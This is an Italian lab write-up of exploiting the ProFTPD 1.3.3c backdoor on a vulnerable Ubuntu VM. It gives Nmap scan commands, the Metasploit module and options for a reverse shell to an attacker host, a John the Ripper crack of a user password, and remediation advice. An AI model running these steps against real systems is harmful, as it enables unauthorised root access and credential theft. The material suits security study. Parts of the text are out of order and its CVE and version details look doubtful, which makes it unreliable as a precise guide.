
Guida passo-passo al test di penetrazione su una VM Ubuntu vulnerabile. Sfruttato il backdoor di ProFTPD 1.3.3c (CVE-2010-4221) per ottenere l'accesso root e catturare la flag. Include enumerazione con Nmap, configurazione del payload di Metasploit e cracking degli hash utente (John the Ripper).
Laboratorio di sicurezza offensiva : ProFTPD 1.3.3c Backdoor Exploit (Flag di root)
Questo report descrive il test di penetrazione eseguito su una macchina virtuale (VM) Linux vulnerabile, concentrandosi sull'identificazione di una vulnerabilità di servizio ad alto rischio che ha consentito l'accesso root immediato.
| Dettaglio | Valore |
|---|---|
| Indirizzo IP del target | [ 192.168.222.130] |
| Indirizzo IP dell'attaccante (LHOST) | [ 192.168.222.128] |
| SO del target | Ubuntu 4ubuntu2.2 (Linux Kernel 3.x) |
| Obiettivo | Ottenere una shell di livello root e recuperare il file della flag. |
La ricognizione iniziale ha comportato una scansione dei servizi utilizzando Nmap per identificare le porte aperte e le versioni dei servizi.
Comando:
sudo nmap -sS -sV 192.168.222.130
Risultati principali: | Porta | Servizio | Versione | Rischio | | :--- | :--- | :--- | :--- | 21/tcp | ftp | ProFTPD 1.3.3c | CRITICO (Backdoor sfruttabile) | | 22/tcp | ssh | OpenSSH 7.2p2 | Basso (Servizio standard) | | 80/tcp | http | Apache httpd 2.4.18 | Basso (Nessuna vulnerabilità web evidente trovata) |
Successivamente, una scansione con script per le vulnerabilità ha confermato l'esistenza di un backdoor estremamente critico all'interno del servizio FTP. L'output dello script Nmap ha mostrato esplicitamente l'esecuzione di comandi come utente root:
| ftp-proftpd-backdoor: | This installation has been backdoored. | Command: id |_ Results: uid=0(root) gid=0(root) groups=0(root)...
Passaggi dello sfruttamento: Avvia Metasploit: msfconsole
Seleziona il modulo exploit: use exploit/unix/ftp/proftpd_133c_backdoor
Imposta le opzioni:
Bash
set RHOSTS 192.168.222.130 set PAYLOAD cmd/unix/reverse set LHOST 192.168.222.128
Risultato: una sessione di shell di comando è stata stabilita con successo, garantendo privilegi di root immediati (uid=0).
Comando utilizzato (sulla macchina attaccante):
Bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt Credenziale decifrata:
Utente: marlinspike
Password: marlinspike
Patch/aggiornamento immediato: Il servizio ProFTPD deve essere immediatamente patchato o aggiornato a una versione sicura (superiore alla 1.3.3g) per correggere il backdoor noto e le relative CVE.
Rimozione del servizio: Se FTP non è richiesto per il funzionamento del sistema, il servizio dovrebbe essere completamente rimosso.
Configurazione del firewall: Implementare regole firewall rigide (iptables/ufw) per bloccare l'accesso esterno alla Porta 21.
Configurazioni sicure della shell: Rivedere le configurazioni SSH per disabilitare il login di root e imporre l'autenticazione basata su chiave. Esegui: exploit